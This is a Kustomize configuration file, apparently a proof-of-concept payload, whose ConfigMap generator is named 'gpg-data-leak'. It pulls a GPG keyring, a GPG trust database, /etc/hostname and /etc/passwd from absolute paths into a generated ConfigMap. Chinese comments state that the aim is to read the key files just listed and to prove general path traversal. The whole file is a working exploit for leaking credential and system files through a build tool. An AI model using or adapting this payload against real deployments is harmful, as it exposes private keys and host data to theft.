apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization

generatorOptions:
  disableNameSuffixHash: true

configMapGenerator:
- name: gpg-data-leak
  files:
    # 读取你刚才 ls 出来的关键文件
    - .gpg_keyring=/app/config/gpg/keys/pubring.kbx
    - .gpg_trust=/app/config/gpg/keys/trustdb.gpg
    # 同时读取系统文件证明通用路径遍历
    - .etc_hostname=/etc/hostname
    - .etc_passwd=/etc/passwd
